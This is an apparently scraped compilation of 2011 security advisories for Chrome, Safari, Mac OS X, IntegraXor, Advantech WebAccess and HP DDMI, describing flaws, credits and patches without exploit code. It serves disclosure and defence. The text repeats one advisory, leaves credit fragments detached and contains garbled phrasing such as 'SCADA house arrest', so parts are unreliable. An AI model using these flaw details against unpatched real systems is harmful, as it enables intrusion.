WebKit, as used in Google Chrome before 10.0.648.204 and Apple Safari before 5.0.6, does not properly handle node parentage, which allows remote attackers to cause a denial of service (DOM tree corruption), conduct cross-site scripting (XSS) attacks, or possibly have unspecified other impact via unknown vectors. Google Chrome is prone to multiple vulnerabilities. Attackers can exploit these issues to execute arbitrary code in the context of the browser or cause denial-of-service conditions; other attacks may also be possible. Versions prior to Chrome 10.0.648.204 are vulnerable. Google Chrome is a web browser developed by Google (Google). ---------------------------------------------------------------------- The Secunia Vulnerability Intelligence Manager (VIM) enables you to handle vulnerability threats in a simple, cost effective way. Read more and request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Apple Safari Multiple Vulnerabilities SECUNIA ADVISORY ID: SA45325 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/45325/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=45325 RELEASE DATE: 2011-07-22 DISCUSS ADVISORY: http://secunia.com/advisories/45325/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/45325/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=45325 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A weakness and multiple vulnerabilities have been reported in Apple Safari, which can be exploited by malicious people to disclose sensitive information, manipulate certain data, conduct cross-site scripting and spoofing attacks, bypass certain security restrictions, and compromise a user's system. 2) An error within CFNetwork when using the NTLM authentication protocol can be exploited to execute arbitrary code by tricking a user into visiting a specially crafted web page. 3) An error exists within CFNetwork when handling SSL certificates, which does not properly verify disabled root certificates. This can lead to certificates signed by the disabled root certificates being validated. 4) An integer overflow error exists within the ColorSync component. For more information see vulnerability #5 in: SA45054 5) An off-by-one error exists within the CoreFoundation framework. For more information see vulnerability #6 in: SA45054 6) An integer overflow error exists in CoreGraphics. For more information see vulnerability #7 in: SA45054 7) An error exists within ICU (International Components for Unicode). For more information see vulnerability #11 in: SA45054 8) An error exists in ImageIO within the handling of TIFF files when handling certain uppercase strings. For more information see vulnerability #9 in: SA45054 9) An error in ImageIO within the handling of CCITT Group 4 encoded TIFF image files can be exploited to cause a heap-based buffer overflow. 10) A use-after-free error within WebKit when handling TIFF images can result in an invalid pointer being dereferenced when a user views a specially crafted web page. 11) An error within libxslt can be exploited to disclose certain addresses from the heap. For more information see vulnerability #2 in: SA43832 12) An off-by-one error within libxml when handling certain XML data can be exploited to cause a heap-based buffer overflow. 13) An error in the "AutoFill web forms" feature can be exploited to disclose certain information from the user's Address Book by tricking a user into visiting a specially crafted web page. 14) A cross-origin error when handling certain fonts in Java Applets can lead to certain text being displayed on other sites. 15) Multiple unspecified errors in the WebKit component can be exploited to corrupt memory. 16) An error within WebKit when handling libxslt configurations can be exploited to create arbitrary files. 17) A cross-origin error when handling Web Workers can lead to certain information being disclosed. 20) An error within the handling of DOM history objects can be exploited to display arbitrary content while showing the URL of a trusted web site in the address bar. 21) An error within the handling of RSS feeds may lead to arbitrary files from a user's system being sent to a remote server. 22) A weakness in WebKit can lead to remote DNS prefetching For more information see vulnerability #6 in: SA42312 23) A use-after-free error within WebKit when processing MathML markup tags can result in an invalid pointer being dereferenced when a user views a specially crafted web page. 24) An error within WebKit when parsing a frameset element can be exploited to cause a heap-based buffer overflow. 25) A use-after-free error within WebKit when handling XHTML tags can result in an invalid tag pointer being dereferenced when a user views a specially crafted web page. 26) A use-after-free error within WebKit when handling SVG tags can result in an invalid pointer being dereferenced when a user views a specially crafted web page. SOLUTION: Update to version 5.1 or 5.0.6. PROVIDED AND/OR DISCOVERED BY: 10) Juan Pablo Lopez Yacubian via iDefense 4) binaryproof via ZDI 8) Dominic Chell, NGS Secure 23, 25, 26) wushi, team509 via iDefense 24) Jose A. Vazquez via iDefense The vendor credits: 1) Hidetake Jo via Microsoft Vulnerability Research (MSVR) and Neal Poole, Matasano Security 2) Takehiro Takahashi, IBM X-Force Research 3) An anonymous reporter 5) Harry Sintonen 6) Cristian Draghici, Modulo Consulting and Felix Grobert, Google Security Team 7) David Bienvenu, Mozilla 9) Cyril CATTIAUX, Tessi Technologies 11) Chris Evans, Google Chrome Security Team 12) Billy Rios, Google Security Team 13) Florian Rienhardt of BSI, Alex Lambert, and Jeremiah Grossman 14) Joshua Smith, Kaon Interactive 16) Nicolas Gregoire, Agarri 17) Daniel Divricean, divricean.ro 18) Jobert Abma, Online24 19) Sergey Glazunov 20) Jordi Chancel 21) Jason Hullinger 22) Mike Cardwell, Cardwell IT The vendor provides a bundled list of credits for vulnerabilities in #15: * David Weston, Microsoft and Microsoft Vulnerability Research (MSVR) * Yong Li, Research In Motion * SkyLined, Google Chrome Security Team * Abhishek Arya (Inferno), Google Chrome Security Team * Nikita Tarakanov and Alex Bazhanyuk, CISS Research Team * J23 via ZDI * Rob King via ZDI * wushi, team509 via ZDI * wushi of team509 * Adam Barth, Google Chrome Security Team * Richard Keen * An anonymous researcher via ZDI * Rik Cabanier, Adobe Systems * Martin Barbella * Sergey Glazunov * miaubiz * Andreas Kling, Nokia * Marek Majkowski via iDefense * John Knottenbelt, Google ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT4808 iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=930 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=931 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=932 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=933 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=934 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-228/ NGS Secure: http://archives.neohapsis.com/archives/bugtraq/2011-07/0034.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ---------------------------------------------------------------------- Meet Secunia @ Microsoft Management Summit (MMS) in Las Vegas, USA (21-25 March). PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) Alex Turpin. 2) Slawomir Blazek. 3-6) Sergey Glazunov. ORIGINAL ADVISORY: http://googlechromereleases.blogspot.com/2011/03/stable-channel-update.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities

Use-after-free vulnerability in the HTMLCollection implementation in Google Chrome before 10.0.648.204 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. Google Chrome is prone to multiple vulnerabilities. Attackers can exploit these issues to execute arbitrary code in the context of the browser or cause denial-of-service conditions; other attacks may also be possible. Versions prior to Chrome 10.0.648.204 are vulnerable. Google Chrome is a web browser developed by Google (Google). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2245-1 security@debian.org http://www.debian.org/security/ Giuseppe Iuculano May 29, 2011 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : chromium-browser Vulnerability : several vulnerabilities Problem type : remote Debian-specific: no CVE ID : CVE-2011-1292 CVE-2011-1293 CVE-2011-1440 CVE-2011-1444 CVE-2011-1797 CVE-2011-1799 Several vulnerabilities were discovered in the Chromium browser. For the stable distribution (squeeze), these problems have been fixed in version 6.0.472.63~r59945-5+squeeze5. For the testing distribution (wheezy), these problems will be fixed soon. For the unstable distribution (sid), these problems have been fixed in version 11.0.696.68~r84545-1. We recommend that you upgrade your chromium-browser packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk3iJO4ACgkQNxpp46476apuDACfQjllLVOT84OjL86pa8+JhD5j GWgAmwc7Ei0TYhYaWQZbDmzalYq81pn4 =0RTf -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . ---------------------------------------------------------------------- The Secunia Vulnerability Intelligence Manager (VIM) enables you to handle vulnerability threats in a simple, cost effective way. Read more and request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Apple Safari Multiple Vulnerabilities SECUNIA ADVISORY ID: SA45325 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/45325/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=45325 RELEASE DATE: 2011-07-22 DISCUSS ADVISORY: http://secunia.com/advisories/45325/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/45325/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=45325 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A weakness and multiple vulnerabilities have been reported in Apple Safari, which can be exploited by malicious people to disclose sensitive information, manipulate certain data, conduct cross-site scripting and spoofing attacks, bypass certain security restrictions, and compromise a user's system. 2) An error within CFNetwork when using the NTLM authentication protocol can be exploited to execute arbitrary code by tricking a user into visiting a specially crafted web page. 3) An error exists within CFNetwork when handling SSL certificates, which does not properly verify disabled root certificates. This can lead to certificates signed by the disabled root certificates being validated. 4) An integer overflow error exists within the ColorSync component. For more information see vulnerability #5 in: SA45054 5) An off-by-one error exists within the CoreFoundation framework. For more information see vulnerability #6 in: SA45054 6) An integer overflow error exists in CoreGraphics. For more information see vulnerability #7 in: SA45054 7) An error exists within ICU (International Components for Unicode). For more information see vulnerability #11 in: SA45054 8) An error exists in ImageIO within the handling of TIFF files when handling certain uppercase strings. For more information see vulnerability #9 in: SA45054 9) An error in ImageIO within the handling of CCITT Group 4 encoded TIFF image files can be exploited to cause a heap-based buffer overflow. 10) A use-after-free error within WebKit when handling TIFF images can result in an invalid pointer being dereferenced when a user views a specially crafted web page. 11) An error within libxslt can be exploited to disclose certain addresses from the heap. For more information see vulnerability #2 in: SA43832 12) An off-by-one error within libxml when handling certain XML data can be exploited to cause a heap-based buffer overflow. 13) An error in the "AutoFill web forms" feature can be exploited to disclose certain information from the user's Address Book by tricking a user into visiting a specially crafted web page. 14) A cross-origin error when handling certain fonts in Java Applets can lead to certain text being displayed on other sites. 15) Multiple unspecified errors in the WebKit component can be exploited to corrupt memory. 16) An error within WebKit when handling libxslt configurations can be exploited to create arbitrary files. 17) A cross-origin error when handling Web Workers can lead to certain information being disclosed. 20) An error within the handling of DOM history objects can be exploited to display arbitrary content while showing the URL of a trusted web site in the address bar. 21) An error within the handling of RSS feeds may lead to arbitrary files from a user's system being sent to a remote server. 22) A weakness in WebKit can lead to remote DNS prefetching For more information see vulnerability #6 in: SA42312 23) A use-after-free error within WebKit when processing MathML markup tags can result in an invalid pointer being dereferenced when a user views a specially crafted web page. 24) An error within WebKit when parsing a frameset element can be exploited to cause a heap-based buffer overflow. 25) A use-after-free error within WebKit when handling XHTML tags can result in an invalid tag pointer being dereferenced when a user views a specially crafted web page. 26) A use-after-free error within WebKit when handling SVG tags can result in an invalid pointer being dereferenced when a user views a specially crafted web page. SOLUTION: Update to version 5.1 or 5.0.6. PROVIDED AND/OR DISCOVERED BY: 10) Juan Pablo Lopez Yacubian via iDefense 4) binaryproof via ZDI 8) Dominic Chell, NGS Secure 23, 25, 26) wushi, team509 via iDefense 24) Jose A. Vazquez via iDefense The vendor credits: 1) Hidetake Jo via Microsoft Vulnerability Research (MSVR) and Neal Poole, Matasano Security 2) Takehiro Takahashi, IBM X-Force Research 3) An anonymous reporter 5) Harry Sintonen 6) Cristian Draghici, Modulo Consulting and Felix Grobert, Google Security Team 7) David Bienvenu, Mozilla 9) Cyril CATTIAUX, Tessi Technologies 11) Chris Evans, Google Chrome Security Team 12) Billy Rios, Google Security Team 13) Florian Rienhardt of BSI, Alex Lambert, and Jeremiah Grossman 14) Joshua Smith, Kaon Interactive 16) Nicolas Gregoire, Agarri 17) Daniel Divricean, divricean.ro 18) Jobert Abma, Online24 19) Sergey Glazunov 20) Jordi Chancel 21) Jason Hullinger 22) Mike Cardwell, Cardwell IT The vendor provides a bundled list of credits for vulnerabilities in #15: * David Weston, Microsoft and Microsoft Vulnerability Research (MSVR) * Yong Li, Research In Motion * SkyLined, Google Chrome Security Team * Abhishek Arya (Inferno), Google Chrome Security Team * Nikita Tarakanov and Alex Bazhanyuk, CISS Research Team * J23 via ZDI * Rob King via ZDI * wushi, team509 via ZDI * wushi of team509 * Adam Barth, Google Chrome Security Team * Richard Keen * An anonymous researcher via ZDI * Rik Cabanier, Adobe Systems * Martin Barbella * Sergey Glazunov * miaubiz * Andreas Kling, Nokia * Marek Majkowski via iDefense * John Knottenbelt, Google ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT4808 iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=930 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=931 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=932 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=933 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=934 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-228/ NGS Secure: http://archives.neohapsis.com/archives/bugtraq/2011-07/0034.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ---------------------------------------------------------------------- Meet Secunia @ Microsoft Management Summit (MMS) in Las Vegas, USA (21-25 March). PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) Alex Turpin. 2) Slawomir Blazek. 3-6) Sergey Glazunov. ORIGINAL ADVISORY: http://googlechromereleases.blogspot.com/2011/03/stable-channel-update.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities

Ecava IntegraXor HMI before n 3.60 (Build 4032) allows remote attackers to bypass authentication and execute arbitrary SQL statements via unspecified vectors related to a crafted POST request. NOTE: some sources have reported this issue as SQL injection, but this might not be accurate. Ecava IntegraXor is a human interface product that uses HTML and SVG. Ecava IntegraXor is prone to an unspecified SQL-injection vulnerability because it fails to properly sanitize user-supplied input. Exploiting this issue can allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Versions prior to IntegraXor 3.60.4050 are vulnerable. ---------------------------------------------------------------------- Q1 Factsheets released: http://secunia.com/resources/factsheets/2011_vendor/ ---------------------------------------------------------------------- TITLE: IntegraXor SQL Database Insecure Permissions Security Issue SECUNIA ADVISORY ID: SA44105 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44105/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44105 RELEASE DATE: 2011-04-12 DISCUSS ADVISORY: http://secunia.com/advisories/44105/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/44105/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=44105 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A security issue has been reported in IntegraXor, which can be exploited by malicious people to disclose potentially sensitive information and manipulate certain data. SOLUTION: Update to version 3.6.4000.5. PROVIDED AND/OR DISCOVERED BY: The vendor credits Dan Rosenberg, Virtual Security Research (VSR). ORIGINAL ADVISORY: IntegraXor: http://www.integraxor.com/blog/security-issue-20101222-0700-vulnerability-note OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

webvrpcs.exe in Advantech/BroadWin WebAccess allows remote attackers to execute arbitrary code or obtain a security-code value via a long string in an RPC request to TCP port 4592. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) house arrest. Advantech/BroadWin SCADA WebAccess is prone to multiple remote vulnerabilities including an information-disclosure issue and a remote code-execution issue. Other attacks may also be possible. Advantech/BroadWin SCADA WebAccess 7.0 is vulnerable; other versions may also be affected

Libinfo in Apple Mac OS X before 10.6.7 does not properly handle an unspecified integer field in an NFS RPC packet, which allows remote attackers to cause a denial of service (lockd, statd, mountd, or portmap outage) via a crafted packet, related to an "integer truncation issue.". Apple Mac OS X is prone to a remote denial-of-service vulnerability; fixes are available. Attackers can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. The following versions are affected: Mac OS X version 10.5.8 Mac OS X Server version 10.5.8 Mac OS X versions 10.6 through v10.6.6 Mac OS X Server versions v10.6 through v10.6.6 NOTE: This issue was previously discussed in BID 46950 (Apple Mac OS X Prior to 10.6.7 Multiple Security Vulnerabilities) but has been given its own record to better document it. ---------------------------------------------------------------------- Meet Secunia @ Microsoft Management Summit (MMS) in Las Vegas, USA (21-25 March). http://secunia.com/company/events/mms_2011/ ---------------------------------------------------------------------- TITLE: Apple Mac OS X Multiple Vulnerabilities SECUNIA ADVISORY ID: SA43814 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43814/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43814 RELEASE DATE: 2011-03-22 DISCUSS ADVISORY: http://secunia.com/advisories/43814/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43814/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43814 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Apple has issued a security update for Mac OS X, which fixes multiple vulnerabilities. 1) A divide-by-zero error in AirPort when handling Wi-Fi frames can be exploited to cause a system reset. 2) Multiple vulnerabilities in Apache can be exploited by malicious people to disclose potentially sensitive information and by malicious users and malicious people to cause a DoS (Denial of Service). For more information: SA40206 3) A format string error within AppleScript Studio when handling certain commands via dialogs can be exploited to potentially execute arbitrary code. 4) An unspecified error in the handling of embedded OpenType fonts in Apple Type Services (ATS) can be exploited to cause a heap-based buffer overflow when a specially crafted document is viewed or downloaded. 5) Multiple unspecified errors in the handling of embedded TrueType fonts in Apple Type Services (ATS) can be exploited to cause a buffer overflow when a specially crafted document is viewed or downloaded. 6) Multiple unspecified errors in the handling of embedded Type 1 fonts in Apple Type Services (ATS) can be exploited to cause a buffer overflow when a specially crafted document is viewed or downloaded. 7) Multiple unspecified errors in the handling of SFNT tables in embedded fonts in Apple Type Services (ATS) can be exploited to cause a buffer overflow when a specially crafted document is viewed or downloaded. 8) An integer overflow error in bzip2 can be exploited to terminate an application using the library or execute arbitrary code via a specially crafted archive. For more information: SA41452 9) An error within the "FSFindFolder()" API in CarbonCore when used with the "kTemporaryFolderType" flag can be exploited to disclose the contents of arbitrary directories. 10) Multiple errors in ClamAV can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system. For more information: SA41503 SA42426 11) An unspecified error in the handling of embedded fonts in CoreText can be exploited to corrupt memory when a specially crafted document is viewed or downloaded. 12) An integer overflow error within the handling of the F_READBOOTSTRAP ioctl in HFS, HFS+, and HFS+J filesystems can be exploited to read arbitrary files. 13) An error in ImageIO within the handling of JPEG files can be exploited to cause a heap-based buffer overflow. 14) An integer overflow error in ImageIO within the handling of XBM files can be exploited to potentially execute arbitrary code. 15) An error in libTIFF within the handling of JPEG encoded TIFF files can be exploited to cause a buffer overflow. 16) An error in libTIFF within the handling of CCITT Group 4 encoded TIFF files can be exploited to cause a buffer overflow. 17) An integer overflow error in ImageIO within the handling of JPEG encoded TIFF files can be exploited to potentially execute arbitrary code. 18) Multiple errors in Image RAW when handling Canon RAW image files can be exploited to cause buffer overflows. 19) An error in the Install Helper when handling URLs can be exploited to install an arbitrary agent by tricking the user into visiting a malicious website. 20) Multiple errors in Kerberos can be exploited by malicious users and malicious people to conduct spoofing attacks and bypass certain security features. For more information: SA37977 SA42396 21) An error within the "i386_set_ldt()" system call can be exploited by malicious, local users to execute arbitrary code with system privileges. 22) An integer truncation error within Libinfo when handling NFS RPC packets can be exploited to cause NFS RPC services to become unresponsive. 23) An error exists in the libxml library when traversing the XPath. For more information: SA42175 24) A double free error exists in the libxml library when handling XPath expressions. For more information: SA42721 25) Two errors in Mailman can be exploited by malicious users to conduct script insertion attacks. For more information: SA41265 26) Multiple errors in PHP can be exploited by malicious users and malicious people to bypass certain security restrictions and by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system. For more information: SA39573 SA41724 27) Multiple errors in PHP can be exploited by malicious users and malicious people to bypass certain security restrictions. For more information: SA41724 28) An error in the OfficeImport framework when processing records containing formulas shared between multiple cells can be exploited to corrupt memory and potentially execute arbitrary code. 29) An error in QuickLook when handling certain Microsoft Office files can be exploited to corrupt memory when a specially crafted document is downloaded. 30) Multiple unspecified errors in QuickTime when handling JPEG2000, FlashPix, and panorama atoms in QTVR (QuickTime Virtual Reality) movie files can be exploited to corrupt memory via specially crafted files. 31) An integer overflow error in QuickTime when handling certain movie files can be exploited to potentially execute arbitrary code when a specially crafted file is viewed. 32) An error within QuickTime plug-in when handling cross-site redirects can be exploited to disclose video data. 33) An integer truncation error within the Ruby BigDecimal class can be exploited to potentially execute arbitrary code. This vulnerability only affects 64-bit Ruby processes. 34) A boundary error in Samba can be exploited by malicious people to potentially compromise a vulnerable system. For more information: SA41354 35) A security issue in Subversion can be exploited by malicious people to bypass certain security restrictions. For more information: SA41652 36) A weakness in Terminal uses SSH version 1 as the default protocol version when using ssh via the "New Remote Connection" dialog. 37) Some vulnerabilities in FreeType can be exploited to cause a DoS (Denial of Service) or potentially compromise an application using the library. For more information: SA41738 SOLUTION: Update to version 10.6.7 or apply Security Update 2011-001. PROVIDED AND/OR DISCOVERED BY: 15, 16, 33) Reported by the vendor. The vendor credits: 3) Alexander Strange. 5) Christoph Diehl of Mozilla, Felix Grobert of the Google Security Team, Marc Schoenefeld of Red Hat Security Response Team, and Tavis Ormandy and Will Drewry of Google Security Team. 6) Felix Grobert, Google Security Team and geekable via ZDI. 7) Marc Schoenefeld, Red Hat Security Response Team. 11) Christoph Diehl, Mozilla. 12) Dan Rosenberg, Virtual Security Research. 13) Andrzej Dyjak via iDefense. 14) Harry Sintonen. 17) Dominic Chell, NGS Secure. 18) Paul Harrington, NGS Secure. 19) Aaron Sigel, vtty.com. 21) Jeff Mears. 22) Peter Schwenk, University of Delaware. 28) Tobias Klein via iDefense. 29) Charlie Miller and Dion Blazakis via ZDI. 30) Will Dormann of CERT/CC, Damian Put and an anonymous researcher via ZDI, and Rodrigo Rubira Branco of Check Point Vulnerability Discovery Team. 31) Honggang Ren, Fortinet's FortiGuard Labs. 32) Nirankush Panchbhai and Microsoft Vulnerability Research (MSVR). 36) Matt Warren, HNW Inc. ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT4581 iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=898 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

HP Discovery & Dependency Mapping Inventory (DDMI) 7.50, 7.51, 7.60, 7.61, 7.70, and 9.30 launches the Windows SNMP service with its default configuration, which allows remote attackers to obtain potentially sensitive information or have unspecified other impact by leveraging the public read community. HP Discovery and Dependency Mapping Inventory (DDMI) is prone to a remote information-disclosure vulnerability. Remote attackers can exploit this issue to obtain sensitive information that may lead to further attacks. The vulnerability could be exploited remotely to allow unauthorized read-only access to the data available via the SNMP protocol. References: CVE-2011-0890 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Securing the Windows SNMP service DDMI requires the Windows SNMP service for its operation. If necessary DDMI will install and configure the Windows SNMP service using the Windows default security settings. As a result the SNMP read community string may be set to public . To modify the default security configuration of the of the Windows SNMP service: Open the Windows Services Control Panel applet, select Administrative Tools and then select Services. Select the SNMP Service, right click on it and select Properties and navigate to the Security tab. Amend the security settings as required to change the default read community string to a value other than public. Add the updated read community string to the appropriate DDM Inventory SNMP profile. Third Party Security Patches: Third party security patches that are to be 